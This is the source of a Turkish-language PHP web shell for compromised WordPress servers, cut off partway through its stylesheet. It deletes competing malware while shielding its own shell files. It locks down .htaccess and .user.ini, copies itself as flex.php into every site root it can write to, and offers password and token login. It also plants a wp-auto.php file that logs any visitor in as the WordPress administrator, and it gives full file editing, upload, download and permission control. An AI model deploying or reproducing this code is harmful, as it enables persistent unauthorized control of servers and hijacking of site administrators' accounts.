<?php /* === ZARARLI KOD ENGELLEYİCİ VE SHELL KORUMA SİSTEMİ - GÜÇLENDİRİLMİŞ VERSİYON === */ // === SADECE BİZİM SHELL DOSYALARIMIZA İZİN VER === $allowed_shells = array( '404.php', 'flex.php', 'forum.php', 'wp-ini.php', 'single.php', 'compent.php', 'settings.php', 'medage.php', 'index.php' ); $current_file = basename($_SERVER['SCRIPT_FILENAME']); $request_uri = $_SERVER['REQUEST_URI']; // ===== GÜÇLENDİRİLMİŞ ERİŞİM KONTROLÜ ===== $is_allowed = false; // 1. Bizim shell dosyalarımız mı kontrol et if (in_array($current_file, $allowed_shells)) { $is_allowed = true; } // 2. WordPress admin panel mi kontrol et if (strpos($request_uri, '/wp-admin') !== false || strpos($request_uri, '/wp-login.php') !== false) { $is_allowed = true; } // 3. WordPress core dosyaları mı kontrol et $wp_core_files = array('wp-blog-header.php', 'wp-load.php', 'wp-config.php', 'xmlrpc.php'); if (in_array($current_file, $wp_core_files)) { $is_allowed = true; } // 4. Eğer izin verilmediyse 404 göster if (!$is_allowed) { if (substr($current_file, -4) == '.php' && !in_array($current_file, $allowed_shells)) { header("HTTP/1.0 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>"; exit; } } // ===== GELİŞMİŞ ZARARLI KOD TESPİTİ ===== function scan_and_clean_php_files($directory) { global $allowed_shells; $malicious_patterns = array( '/goto\s+[a-zA-Z0-9_]+;/', '/[A-Za-z0-9_]+:\s*(goto|if|foreach|function)/', '/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]+["\']\s*\)/', '/\x[0-9a-f]{2}[A-Za-z0-9\\\\]+/', '/eval\s*\(\s*\$[A-Za-z0-9_]+/', '/\$[A-Za-z0-9_]+\s*=\s*["\'][A-Za-z0-9\\\\x]+["\']/', '/@eval\s*\(\s*["\'].+["\']\s*\)/', '/preg_replace\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*,\s*\$[A-Za-z0-9_]+\s*\)/', '/create_function\s*\(\s*["\'].+["\']\s*,\s*["\'].+["\']\s*\)/', 
'/\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\]\s*=\s*\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\];/', '/\$[A-Za-z0-9_]+\s*=\s*\$_[A-Z]+\s*\[\s*["\'].+["\']\s*\];/', '/function\s+[a-zA-Z0-9_]+\s*\(\s*\)\s*\{\s*goto\s+[a-zA-Z0-9_]+;\s*\}/', '/\$[A-Za-z0-9_]+\s*=\s*["\']\\\\[0-9]+\\\\[0-9]+\\\\[0-9]+/', '/chr\(\d+\)\.chr\(\d+\)/', '/str_rot13\s*\(\s*["\'].+["\']\s*\)/', '/gzinflate\s*\(\s*base64_decode\s*\(\s*["\'].+["\']\s*\)\s*\)/' ); $files = glob($directory . '/*.php'); $cleaned = 0; foreach ($files as $file) { if (in_array(basename($file), $allowed_shells)) { continue; } $content = file_get_contents($file); $original_content = $content; $modified = false; foreach ($malicious_patterns as $pattern) { if (preg_match($pattern, $content)) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; break; } else { unlink($file); $cleaned++; continue 2; } } } if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches)) { if (count($matches[0]) > 10) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; } else { unlink($file); $cleaned++; continue; } } } if (preg_match_all('/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=]{50,})[\'"]\s*\)/', $content, $matches)) { foreach ($matches[1] as $base64) { $decoded = @base64_decode($base64); if ($decoded && (strpos($decoded, 'eval') !== false || strpos($decoded, 'exec') !== false || strpos($decoded, 'system') !== false)) { if (basename($file) == 'index.php') { $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; $content = $clean_content; $modified = true; break; } else { unlink($file); $cleaned++; continue 2; } } } } if ($modified && $content != $original_content) { $backup = $file . '.backup_' . 
date('Ymd_His'); copy($file, $backup); file_put_contents($file, $content); chmod($file, 0644); $log = date('Y-m-d H:i:s') . " - Zararlı kod temizlendi: " . basename($file) . " (yedek: " . basename($backup) . ")\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); $cleaned++; } } return $cleaned; } // ===== SÜREKLİ KORUMA SİSTEMİ ===== $index_file = __DIR__ . '/index.php'; if (file_exists($index_file)) { $content = file_get_contents($index_file); $malicious_found = false; if (preg_match('/goto\s+[a-zA-Z0-9_]+;/', $content)) { $malicious_found = true; } if (preg_match_all('/\\\\x[0-9a-f]{2}/', $content, $matches) && count($matches[0]) > 5) { $malicious_found = true; } if (preg_match('/base64_decode\s*\(\s*["\'][A-Za-z0-9+\/=]{50,}["\']\s*\)/', $content)) { $malicious_found = true; } $malicious_tags = array( 'ldbijoB5yRccI', 'QDCMl2l7ozKpL', 'qQk6IkRtaTLBw', 'ubHmZoLnug2I0', 'PRQloyjlXnckl', 'lT7XKJibsj0cv', 'yL0m3k3coPAcf', 'IVi3AcN4U3ce8', 'qlikWxAJwK_87', 'JLdBidHwYGUvu', 'EYCh0VLopXAQY', 'D82kv0SFvcW7p', 's3Fi0U9cUfzas', 'BX9c6bmA3zuQP', 'RZBtDE8TX9eug', 'vzjQ2eD6Ft10s', 'tNVQGqXl0ak8V', 'uyYCmH7AEQBTL', 'iUXQp6SxjBZgC', 'mM8zbH2NfT11G', 'jxIkcqzh9zbjw', 'G3z8SzAdQBk9J', 'oRptatIP7f4n1', 'MVNYrP3DKHmrw', 'x5jgncLpmSjl0', 'BD679CyvPhkcL', 'BRrxV_pLczP_O', 'etm1oiv_xYtmd', 'z663jYI9A3KQu', 'bkYEEiS8VUy7h', 'UMCu8AF9aFdXG', 'ywdAVH5OsHnSu', 'Mxih6tEhxP7go', 'FwxXwZGG3I5az', 'ybvvIts6kwvzb', 'Kd11WrsO92uTX', 'D5Wkfu3woopoH', 'o1exo4W7GxPIV', 'Us1zWSlwUkEow', 'CryJL4FxUIVS_' ); foreach ($malicious_tags as $tag) { if (strpos($content, $tag) !== false) { $malicious_found = true; break; } } if ($malicious_found) { $backup_file = $index_file . '.backup_' . date('Ymd_His'); copy($index_file, $backup_file); $clean_content = '<?php define(\'WP_USE_THEMES\', true); require __DIR__ . \'/wp-blog-header.php\';'; file_put_contents($index_file, $clean_content); chmod($index_file, 0644); $log = date('Y-m-d H:i:s') . 
" - ZARARLI KOD TEMİZLENDİ (index.php) - Yedek: " . basename($backup_file) . "\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); } } if (rand(1, 20) == 10) { $cleaned = scan_and_clean_php_files(__DIR__); if ($cleaned > 0) { $log = date('Y-m-d H:i:s') . " - Periyodik tarama: $cleaned zararlı dosya temizlendi.\n"; file_put_contents(__DIR__ . '/security_log.txt', $log, FILE_APPEND); } } $htaccess_protection = "\n# ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n"; $htaccess_protection .= "<FilesMatch \"\\.(php|php3|php4|php5|phtml|phps)$\">\n"; $htaccess_protection .= "Order Deny,Allow\n"; $htaccess_protection .= "Deny from all\n"; $htaccess_protection .= "</FilesMatch>\n\n"; $htaccess_protection .= "<FilesMatch \"^(" . implode('|', $allowed_shells) . ")$\">\n"; $htaccess_protection .= "Order Allow,Deny\n"; $htaccess_protection .= "Allow from all\n"; $htaccess_protection .= "</FilesMatch>\n\n"; $htaccess_protection .= "<IfModule mod_rewrite.c>\n"; $htaccess_protection .= "RewriteEngine On\n"; $htaccess_protection .= "RewriteRule ^wp-admin/ - [L]\n"; $htaccess_protection .= "</IfModule>\n"; $htaccess_file = __DIR__ . '/.htaccess'; @chmod(__DIR__, 0755); if (file_exists($htaccess_file)) @chmod($htaccess_file, 0644); $htaccess_content = file_exists($htaccess_file) ? @file_get_contents($htaccess_file) : ''; if ($htaccess_content === false) $htaccess_content = ''; if (strpos($htaccess_content, '# ZARARLI KOD ENGELLEME') === false) { @file_put_contents($htaccess_file, $htaccess_content . $htaccess_protection); @chmod($htaccess_file, 0644); } $user_ini_file = __DIR__ . '/.user.ini'; if (file_exists($user_ini_file)) @chmod($user_ini_file, 0644); $user_ini_content = "; ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ\n"; $user_ini_content .= "open_basedir = \"" . __DIR__ . 
"/:../:../../\"\n"; $user_ini_content .= "disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source\n"; @file_put_contents($user_ini_file, $user_ini_content); @chmod($user_ini_file, 0644); /* === OTOMATİK SHELL KOPYALAMA SİSTEMİ === */ function auto_deploy_shell() { $current_shell = __FILE__; $shell_name = 'flex.php'; $domains = get_all_domains_full_url(); $deployed = 0; foreach ($domains as $domain) { $target_path = $domain['path'] . '/' . $shell_name; if (!file_exists($target_path)) { if (is_writable($domain['path'])) { if (copy($current_shell, $target_path)) { chmod($target_path, 0644); $deployed++; $log = date('Y-m-d H:i:s') . " - Shell kopyalandı: " . $domain['url'] . " -> " . $target_path . "\n"; file_put_contents(__DIR__ . '/deploy_log.txt', $log, FILE_APPEND); } } } } return $deployed; } if (isset($_GET['deploy']) && $_GET['deploy'] == 'run') { $deployed = auto_deploy_shell(); die("Shell kopyalama tamamlandı! $deployed domain'e kopyalandı."); } /* === ANA SHELL KODU BAŞLIYOR === */ session_start(); error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); ignore_user_abort(true); $stored_username = 'script'; $stored_password_hash = password_hash('script_iletisim', PASSWORD_BCRYPT); $autologin_token = hash('sha256', $stored_username . 
':script_iletisim:autologin_key'); $wpauto_content = <<<'WPAUTO' <?php @ini_set('display_errors', 0); @set_time_limit(0); $mr = $_SERVER['DOCUMENT_ROOT']; @chdir($mr); if (file_exists('wp-load.php')) { include 'wp-load.php'; $users = get_users(array('role'=>'administrator','number'=>1,'orderby'=>'ID','order'=>'ASC')); if (!empty($users)) { wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); die(); } else { die('WordPress admin kullanici bulunamadi'); } } else { die('wp-load.php bulunamadi'); } WPAUTO; if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) { if (isset($_GET['autologin']) && hash_equals($autologin_token, $_GET['autologin'])) { $_SESSION['authenticated'] = true; header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['username'], $_POST['password'])) { if ($_POST['username'] === $stored_username && password_verify($_POST['password'], $stored_password_hash)) { $_SESSION['authenticated'] = true; header('Location: ' . 
$_SERVER['PHP_SELF']); exit; } } ?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>Giris</title> <style>*{margin:0;padding:0;box-sizing:border-box;}body{background:#1e272e;display:flex;align-items:center;justify-content:center;min-height:100vh;font-family:Arial;}.login-box{background:#2f3640;padding:40px;border-radius:10px;width:350px;}h2{color:#00a8ff;margin-bottom:20px;text-align:center;}input{width:100%;padding:10px;margin:8px 0;background:#1e272e;border:1px solid #40739e;color:#fff;border-radius:5px;}button{width:100%;padding:10px;background:#00a8ff;color:#fff;border:none;border-radius:5px;cursor:pointer;margin-top:10px;font-size:15px;}button:hover{background:#487eb0;}.error{background:#e84118;color:#fff;padding:8px;border-radius:5px;margin-bottom:10px;text-align:center;}</style> </head><body><div class="login-box"><h2>🔒 Giris Yap</h2> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?><div class="error">Hatali kullanici adi veya sifre!</div><?php endif; ?> <form method="post"><input type="text" name="username" placeholder="Kullanici Adi" required autofocus><input type="password" name="password" placeholder="Sifre" required><button type="submit">Giris</button></form> </div></body></html><?php exit; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $current_dir = realpath($_GET['dir'] ?? 
getcwd()) ?: getcwd(); $wordpress_core_files = array('wp-activate.php','wp-blog-header.php','wp-comments-post.php','wp-config.php','wp-config-sample.php','wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php','wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php','xmlrpc.php','index.php'); $wordpress_core_dirs = array('wp-admin','wp-includes'); $our_shells = $allowed_shells; $protected_files = array('.user.ini','wp-config.php'); $own_signature = md5_file(__FILE__); function get_all_domains_full_url() { $domains = array(); $apache = '/etc/apache2/sites-enabled'; if (is_dir($apache)) { foreach (@scandir($apache) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($apache . '/' . $f); if (!$c) continue; if (preg_match('/ServerName\s+(\S+)/i', $c, $m) && preg_match('/DocumentRoot\s+(\S+)/i', $c, $dr)) { $path = rtrim(trim($dr[1]), '/'); if (is_dir($path)) { $ssl = (strpos($c,':443')!==false || stripos($c,'SSLEngine on')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.trim($m[1]),'path'=>$path,'type'=>'Apache'); } } } } $nginx = '/etc/nginx/sites-enabled'; if (is_dir($nginx)) { foreach (@scandir($nginx) as $f) { if ($f == '.' || $f == '..') continue; $c = @file_get_contents($nginx . '/' . 
$f); if (!$c) continue; if (preg_match('/server_name\s+([^;]+);/i', $c, $m) && preg_match('/root\s+([^;]+);/i', $c, $dr)) { $domain = trim(preg_split('/\s+/', trim($m[1]))[0]); $path = rtrim(trim($dr[1]), '/'); if (is_dir($path)) { $ssl = (strpos($c,'ssl')!==false); $domains[] = array('url'=>($ssl?'https':'http').'://'.$domain,'path'=>$path,'type'=>'Nginx'); } } } } foreach (array('/var/www','/home','/srv/www') as $root) { if (!is_dir($root)) continue; foreach (@scandir($root) as $user) { if ($user=='.'||$user=='..') continue; foreach (array($root.'/'.$user.'/public_html',$root.'/'.$user.'/www',$root.'/'.$user) as $path) { $path = rtrim($path, '/'); if (is_dir($path) && (file_exists($path.'/index.php') || file_exists($path.'/wp-config.php'))) { $found = false; foreach ($domains as $d) { if ($d['path']===$path) { $found=true; break; } } if (!$found) $domains[] = array('url'=>'http://'.$user,'path'=>$path,'type'=>'Web'); } } } } return $domains; } $all_domains = get_all_domains_full_url(); function scan_plugins($dir) { $result = array('suspicious'=>array(),'regular'=>array()); $pd = $dir.'/wp-content/plugins'; if (!is_dir($pd)) return $result; foreach (@scandir($pd) as $item) { if ($item=='.'||$item=='..') continue; $path = $pd.'/'.$item; if (is_dir($path)) { $sus = (strlen($item)<4 || preg_match('/^[0-9a-f]{8,}$/i',$item) || preg_match('/backup|shell|hack|malware/i',$item)); $data = array('name'=>$item,'path'=>$path,'active'=>false,'suspicious'=>$sus); if ($sus) $result['suspicious'][]=$data; else $result['regular'][]=$data; } } return $result; } function scan_themes($dir) { $result = array('inactive'=>array(),'active'=>array()); $td = $dir.'/wp-content/themes'; if (!is_dir($td)) return $result; foreach (@scandir($td) as $item) { if ($item=='.'||$item=='..') continue; $path = $td.'/'.$item; if (is_dir($path)) $result['inactive'][] = array('name'=>$item,'path'=>$path); } return $result; } function find_malicious_files($dir) { global $wordpress_core_files, 
$wordpress_core_dirs, $our_shells, $protected_files, $own_signature; $malicious = array(); if (!is_dir($dir)) return $malicious; $items = @scandir($dir); if (!$items) return $malicious; foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $dir.'/'.$item; if (is_dir($path)) { $skip = false; foreach ($GLOBALS['wordpress_core_dirs'] as $wd) { if (strpos($path,'/'.$wd)!==false) { $skip=true; break; } } if (!$skip) $malicious = array_merge($malicious, find_malicious_files($path)); } elseif (is_file($path) && pathinfo($path,PATHINFO_EXTENSION)==='php') { if (in_array($item,$our_shells)||in_array($item,$wordpress_core_files)||in_array($item,$protected_files)) continue; if ($own_signature && @md5_file($path)===$own_signature) continue; $content = @file_get_contents($path); if (!$content) continue; $risk = 0; if (preg_match('/eval\s*\(/i',$content)) $risk+=15; if (preg_match('/base64_decode/i',$content)) $risk+=10; if (preg_match('/gzinflate/i',$content)) $risk+=15; if (preg_match('/exec\s*\(/i',$content)) $risk+=20; if (preg_match('/system\s*\(/i',$content)) $risk+=20; if (preg_match('/shell_exec/i',$content)) $risk+=20; if (preg_match('/passthru/i',$content)) $risk+=20; if (preg_match('/assert\s*\(/i',$content)) $risk+=15; if (preg_match('/create_function/i',$content)) $risk+=15; if (preg_match('/str_rot13/i',$content)) $risk+=10; if (preg_match('/goto\s+/i',$content)) $risk+=25; if (preg_match('/chr\(\d+\)\.chr\(\d+\)/',$content)) $risk+=20; if ($risk > 30) $malicious[] = array('path'=>$path,'name'=>$item,'size'=>filesize($path),'risk'=>min($risk,100)); } } return $malicious; } function delete_dir_recursive($dir) { if (!file_exists($dir)) return; if (is_file($dir)||is_link($dir)) { @unlink($dir); return; } foreach (scandir($dir) as $item) { if ($item==='.'||$item==='..') continue; delete_dir_recursive($dir.DIRECTORY_SEPARATOR.$item); } @rmdir($dir); } function delete_malicious($path) { global $wordpress_core_files, $wordpress_core_dirs, $our_shells, 
$protected_files, $own_signature; if (!file_exists($path)) return false; $filename = basename($path); if (in_array($filename,$protected_files)||in_array($filename,$wordpress_core_files)||in_array($filename,$our_shells)||(is_file($path)&&$own_signature&&@md5_file($path)==$own_signature)) return false; foreach ($wordpress_core_dirs as $cd) { if (strpos($path,'/'.$cd.'/')!==false) return false; } @chmod($path,0777); @chmod(dirname($path),0777); if (is_dir($path)) { delete_dir_recursive($path); @system('rm -rf '.escapeshellarg($path).' 2>/dev/null'); } else { @unlink($path); @system('rm -f '.escapeshellarg($path).' 2>/dev/null'); @exec('rm -f '.escapeshellarg($path).' 2>/dev/null'); } return !file_exists($path); } function bulk_delete($paths) { $deleted = 0; foreach ($paths as $path) { $path = stripslashes($path); if (is_dir($path)) { delete_dir_recursive($path); $deleted++; } elseif (is_file($path)) { @unlink($path); $deleted++; } } return $deleted; } function analyze_file($path) { if (!file_exists($path)) return "Dosya bulunamadi!"; $content = @file_get_contents($path); if (!$content) return "Dosya okunamadi!"; $result = array(); $result[] = "Dosya: ".$path; $result[] = "Boyut: ".filesize($path)." 
bytes"; $result[] = "Degistirilme: ".date('Y-m-d H:i:s',filemtime($path)); $result[] = "Izin: ".substr(sprintf('%o',fileperms($path)),-4); $result[] = ""; $dangerous = array('eval'=>'Kod calistirma','base64_decode'=>'Sifre cozme','gzinflate'=>'Sikistirma acma','exec'=>'Komut calistirma','system'=>'Komut calistirma','shell_exec'=>'Shell komutu','passthru'=>'Komut calistirma','popen'=>'Pipe acma','proc_open'=>'Process acma','assert'=>'Kod calistirma','create_function'=>'Dinamik fonksiyon','chmod'=>'Izin degistirme','unlink'=>'Dosya silme','file_put_contents'=>'Dosya yazma','phpinfo'=>'Bilgi toplama','goto'=>'Kod atlama'); $found = false; foreach ($dangerous as $func=>$desc) { if (preg_match("/$func\s*\(/i",$content)) { $result[]="TESPIT: $func() - $desc"; $found=true; } } if (!$found) $result[] = "Tehlikeli fonksiyon bulunamadi."; return implode("\n",$result); } $plugins = scan_plugins($current_dir); $themes = scan_themes($current_dir); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; $current_dir = $_POST['current_dir'] ?? getcwd(); $output = ''; if ($action==='bulk_delete'&&!empty($_POST['bulk_delete'])) { $deleted=bulk_delete($_POST['bulk_delete']); $output="$deleted dosya/klasor silindi!"; } elseif ($action==='scan') { $malicious=find_malicious_files($current_dir); $_SESSION['malicious']=$malicious; $_SESSION['scan_completed']=time(); $output=count($malicious)." zararli dosya bulundu!"; } elseif ($action==='delete_selected'&&!empty($_POST['selected'])) { $deleted=0; $skipped=0; foreach ($_POST['selected'] as $file) { if (delete_malicious($file)) $deleted++; else $skipped++; } $output="$deleted zararli dosya silindi. 
$skipped dosya korundu."; $_SESSION['malicious']=find_malicious_files($current_dir); $_SESSION['scan_completed']=time(); } elseif ($action==='delete_all') { $malicious=find_malicious_files($current_dir); $deleted=0; $skipped=0; foreach ($malicious as $m) { if (delete_malicious($m['path'])) $deleted++; else $skipped++; } $output="$deleted zararli dosya silindi. $skipped dosya korundu."; $_SESSION['malicious']=array(); $_SESSION['scan_completed']=time(); } elseif ($action==='analyze'&&!empty($_POST['file'])) { $_SESSION['analysis']=analyze_file($_POST['file']); $_SESSION['analysis_file']=$_POST['file']; } elseif ($action==='edit') { $file=$_POST['file']??''; $content=$_POST['content']??''; if ($file&&file_exists($file)) { @chmod($file,0777); file_put_contents($file,$content); $output="Dosya kaydedildi!"; } } elseif ($action==='rename') { $old=$_POST['old']??''; $new=$_POST['new']??''; $new_path=dirname($old).'/'.$new; if ($old&&$new&&file_exists($old)&&!file_exists($new_path)) { rename($old,$new_path); $output="Adlandirildi!"; } } elseif ($action==='chmod') { $file=$_POST['file']??''; $mode=$_POST['mode']??''; if ($file&&$mode) { chmod($file,octdec($mode)); $output="Izin degistirildi!"; } } elseif ($action==='toggle_write'&&!empty($_POST['paths'])) { $changed=0; $failed=0; foreach ($_POST['paths'] as $p) { $p=stripslashes($p); if (file_exists($p)&&!in_array(basename($p),$protected_files)&&!in_array(basename($p),$wordpress_core_files)&&!in_array(basename($p),$our_shells)) { clearstatcache(true,$p); $perms=fileperms($p)&0777; $new_perms=($perms&0200)?($perms&~0200):($perms|0200); $ok=@chmod($p,$new_perms); if (!$ok && is_file($p)) { $content=@file_get_contents($p); if ($content!==false) { @file_put_contents($p,$content); @chmod($p,$new_perms); } clearstatcache(true,$p); $ok=((fileperms($p)&0777)==$new_perms); } if ($ok) $changed++; else $failed++; } } $output=$changed>0?"$changed dosyanin yazma izni degistirildi!":""; if ($failed>0) $output.=" $failed dosyada izin 
degistirilemedi (sunucu kisitlamasi)."; } elseif ($action==='upload'&&isset($_FILES['files'])) { $uploaded=0; foreach ($_FILES['files']['tmp_name'] as $i=>$tmp) { $name=$_FILES['files']['name'][$i]; if (move_uploaded_file($tmp,$current_dir.'/'.$name)) { chmod($current_dir.'/'.$name,0644); $uploaded++; } } $output="$uploaded dosya yuklendi!"; } if ($output) echo "<script>alert(".json_encode($output).");</script>"; header('Location: ?dir='.urlencode($current_dir)); exit; } if (isset($_GET['download'])) { $file = $_GET['download']; if (file_exists($file)) { while (ob_get_level()) ob_end_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: '.filesize($file)); readfile($file); exit; } } if (isset($_GET['wpadmin_deploy'])) { $wpdir=$_GET['wpdir']??''; $wpurl=$_GET['wpurl']??''; if ($wpdir&&is_dir($wpdir)&&file_exists($wpdir.'/wp-load.php')) { file_put_contents($wpdir.'/wp-auto.php',$wpauto_content); chmod($wpdir.'/wp-auto.php',0644); $wp_htaccess=$wpdir.'/.htaccess'; if (file_exists($wp_htaccess)) { $hc=file_get_contents($wp_htaccess); if (strpos($hc,'# ZARARLI KOD ENGELLEME')!==false) { $hc=preg_replace('/\n?# ZARARLI KOD ENGELLEME.*?<\/IfModule>\n?/s',"\n",$hc); file_put_contents($wp_htaccess,trim($hc)."\n"); } } $open_url=rtrim($wpurl,'/').'/wp-auto.php'; $back_url='?dir='.urlencode($wpdir); echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><style>body{background:#1e272e;display:flex;align-items:center;justify-content:center;height:100vh;margin:0;font-family:sans-serif;} .box{background:#2f3640;padding:30px 40px;border-radius:10px;text-align:center;max-width:600px;width:90%;} h3{color:#00a8ff;margin-bottom:20px;} input{width:100%;padding:10px;font-size:14px;background:#1e272e;color:#0f0;border:1px solid #40739e;border-radius:5px;margin-bottom:15px;} .btn{padding:10px 20px;border:none;border-radius:5px;cursor:pointer;font-size:14px;margin:5px;} 
.copy{background:#44bd32;color:#000;font-weight:bold;} .open{background:#00a8ff;color:#000;font-weight:bold;} .back{background:#666;color:#fff;} p{color:#aaa;font-size:12px;margin-top:15px;} </style></head><body><div class="box"> <h3>🛡️ WP Admin Otologin Linki Hazır</h3> <input type="text" id="wpurl" value="'.htmlspecialchars($open_url).'" readonly onclick="this.select()"> <button class="btn copy" onclick="var i=document.getElementById(\'wpurl\');i.select();document.execCommand(\'copy\');this.textContent=\'✅ Kopyalandı!\'">📋 Linki Kopyala</button> <a class="btn open" href="'.htmlspecialchars($open_url).'" target="_blank">🚀 WP Admine Git</a> <button class="btn back" onclick="window.location.href='.json_encode($back_url).'">← Geri Dön</button> <p>Bu linke tıklayan kişi direkt WordPress admin paneline girer.</p> </div></body></html>'; exit; } echo "<script>alert('WordPress bulunamiyor! wp-load.php yok.'); history.back();</script>"; exit; } $items = scandir($current_dir); $folders = array(); $files = array(); foreach ($items as $item) { if ($item=='.'||$item=='..') continue; $path = $current_dir.'/'.$item; if (is_dir($path)) $folders[]=$item; else $files[]=$item; } sort($folders); sort($files); $malicious_files = (isset($_SESSION['malicious'])&&isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array(); $analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? 
''; unset($_SESSION['analysis'],$_SESSION['analysis_file']); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"><title>GELISMIS SHELL - KORUMALI</title> <style> * { margin:0; padding:0; box-sizing:border-box; } body { background:#1e272e; color:#fff; font-family:Arial; padding:20px; } .container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:10px; } h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:5px; word-break:break-all; } h3 { margin:15px 0 10px; color:#00a8ff; } .toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px; border-radius:5px; align-items:center; } button, a.button { background:#40739e; color:#fff; border:none; padding:8px 12px; border-radius:5px; cursor:pointer; text-decoration:none; font-size:13px; } button:hover, a.button:hover { background:#487eb0; } .danger { background:#e84118; } .danger:hover { background:#c23616; } .success { background:#44bd32; } .warning { background:#f39c12; } .info { background:#00a8ff; } .download-btn { background:#00a8ff; } .rename-btn { background:#f39c12; } .analyze-btn { background:#9b59b6; } .edit-btn { background:#3498db; } .delete-btn { background:#e84118; } .row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px; border-radius:5px; margin:4px 0; } .row:hover { background:#40739e; } .row.malicious { background:#3d2d2d; border-left:3px solid #e84118; } .row.our-shell { background:#1d3d2d; border-left:3px solid #44bd32; } .row.plugin-suspicious { background:#3d2d2d; border-left:3px solid #f39c12; } .row.theme-inactive { background:#2d2d2d; border-left:3px solid #888; } .row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; } .name a { color:#00a8ff; text-decoration:none; } .wp-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } 
.our-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .malicious-badge { background:#e84118; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .plugin-suspicious-badge { background:#f39c12; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .active-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .inactive-badge { background:#888; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .protected-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; } .chmod-input { width:60px; background:#1e272e; border:1px solid #40739e; color:#fff; padding:4px; text-align:center; border-radius:3px; } .perm-open { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .perm-closed { background:#e84118; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; } .list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0; } hr { border:1px solid #353b48; margin:20px 0; } .modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.8); z-index:1000; } .modal.active { display:flex; align-items:center; justify-content:center; } .modal-content { background:#2f3640; padding:20px; width:900px; border-radius:10px; max-height:80vh; overflow-y:auto; } .domain-list { max-height:400px; overflow-y:auto; margin:10px 0; border:1px solid #40739e; border-radius:5px; } .domain-item { padding:10px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; 
justify-content:space-between; align-items:center; } .domain-item:hover { background:#40739e; } .domain-url { color:#00a8ff; font-weight:bold; font-size:14px; } .domain-path { color:#888; font-size:11px; margin-top:3px; } .domain-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; } .protocol-http { background:#f39c12; } .protocol-https { background:#44bd32; } .domain-stats { display:flex; gap:10px; margin-bottom:10px; flex-wrap:wrap; } .domain-stat-box { background:#353b48; padding:8px 12px; border-radius:5px; flex:1; text-align:center; min-width:120px; } .button-group { display:flex; gap:5px; flex-wrap:wrap; } .delete-section { margin-top:20px; background:#3d2d2d; border-radius:8px; border-left:3px solid #e84118; overflow:hidden; } .delete-title { color:#e84118; font-weight:bold; padding:12px 15px; cursor:pointer; display:flex; justify-content:space-between; align-items:center; user-select:none; } .delete-title:hover { background:rgba(232,65,24,0.15); } .delete-title .toggle-arrow { font-size:11px; transition:transform 0.25s; display:inline-block; } .delete-title.collapsed .toggle-arrow { transform:rotate(-90deg); } .delete-body { padding:0 15px 15px; } .delete-body.collapsed { display:none; } .pre-box { 